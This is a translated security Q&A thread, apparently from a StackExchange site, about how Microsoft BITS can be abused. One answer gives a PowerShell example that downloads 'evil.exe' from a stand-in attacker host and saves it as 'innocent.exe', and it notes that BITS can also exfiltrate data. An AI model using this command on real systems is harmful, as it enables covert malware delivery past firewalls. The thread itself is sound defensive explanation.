Implicaciones de seguridad de Microsoft BITS - Sistema de transferencia inteligente en segundo plano: ¿uso, abuso, límite y remedio?

Navega tus respuestas
2

Uso Networx - para administrar y monitorear la conexión de red de mi máquina. Muestra velocidades de descarga reales y conexiones de red activas.

Así que, unas cuantas veces de repente obtuve estas descargas y no estaba descargando nada, o el uso del navegador e incluso mis actualizaciones de Windows están desactivadas.

So Networks lo muestra como una conexión a través de BITS.

  

TCP PC-MACHINE-NAME: 1650
  server-54-230-186-238.cdg51.r.cloudfront.net: https
  ESTABLECIDO 88.0 KB / s

Pero no tenía forma de ver lo que BITS estaba descargando. Entonces, me conecté y encontré algunas aplicaciones basadas en BITS.

Una de estas aplicaciones llamada BITS Download Manager me muestra lo que BITS está descargando realmente.

  

enlace

  • Me pregunto si las Implicaciones de Seguridad de BITS se usan y abusan de manera legítima e injusta.

  • Además, ¿existe alguna forma de que podamos deshabilitar o limitar el acceso a él de alguna manera, hasta cierto punto, como un Rememdy?

pregunta Alex S 06.08.2016 - 13:41
fuente

2 respuestas

2
  

Me pregunto sobre las implicaciones de seguridad de BITS que se utilizan y abusan de manera legítima e injusta.

BITS por sí mismo no proporciona ningún tipo de seguridad. Es solo un servicio para proporcionar actualizaciones y descargas en segundo plano y se debe agregar cualquier tipo de seguridad mediante el uso del protocolo correspondiente (es decir, http o https) o la validación del contenido transferido en la aplicación (es decir, las firmas).

No hay privilegios especiales para usar BITS. Por lo tanto, es posible que el malware use BITS también, y esto también se usa en la práctica. Para obtener más información, haga simplemente busque o vea, por ejemplo, Malware Lingers con BITS :

  

Los autores e intrusos de malware han abusado del servicio desde al menos el 2007.

    
respondido por el Steffen Ullrich 07.08.2016 - 07:53
fuente
1

Tienes razón al preguntarte. Es posible que un atacante que obtenga acceso de comando a un sistema programe trabajos BITS arbitrarios :

Uso de Windows PowerShell para crear trabajos de transferencia de BITS

Por lo tanto, les proporciona una forma fácil, sin GUI, de descargar sus herramientas en el sistema: 

Start-BitsTransfer -Source http://evil.com/tools/evil.exe -Destination C:\tmp\innocent.exe

Debido a que BITS está optimizado con miras a descargarlo silenciosamente en segundo plano, esta es una forma ideal para que un atacante tome sus archivos (siempre y cuando nadie esté sentado mirando Networx en su computadora inactiva). También tiene la ventaja de que si hay un software de "firewall personal" en uso que limita el acceso a Internet a los programas aprobados, BITS es un programa aprobado.

BITS también se puede utilizar para cargar archivos ( algunos ejemplos aquí ), así como también descargarlos. Por lo tanto, se puede utilizar para filtrar (robar) datos y para descargar herramientas.

    
respondido por el gowenfawr 06.08.2016 - 15:50
fuente

Lea otras preguntas en las etiquetas

Reenvío del puerto 88 para que los usuarios externos se autentiquen con DC Cookie + CSRF Token vs OAuth Token para aplicaciones móviles nativas